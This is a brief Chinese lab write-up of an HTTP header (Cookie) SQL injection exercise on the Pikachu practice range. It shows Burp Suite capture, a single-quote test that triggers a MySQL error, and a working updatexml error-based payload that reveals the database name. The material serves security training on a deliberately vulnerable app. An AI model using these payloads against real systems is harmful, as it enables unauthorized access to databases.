本文共 541 字,大约阅读时间需要 1 分钟。
实验环境:
皮卡丘靶场—HTTP Header注入Cookie作用:
Cookie用于跟踪会话,后台会获取前端cookie来进行验证操作。实验步骤:
根据提示,先login(admin/123456)
使用burpsuite进行抓包,并发送到repeater中
此处有[uname]和[pw],因此猜测此处可能为用户用于登录的cookie
在用户名admin后面增加单引号admin’
查看返回报文,有数据库报错信息:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘10470c3b4b1fed12c3baac014be15fac67c6e815’’ at line 1构造payload:admin’ and updatexml(1, concat(0x7e, database()), 0)# 或 admin’ or updatexml(0, concat(0x7e, database()),1)#
在返回报文中显示了当前数据库
转载地址:http://esfmf.baihongyu.com/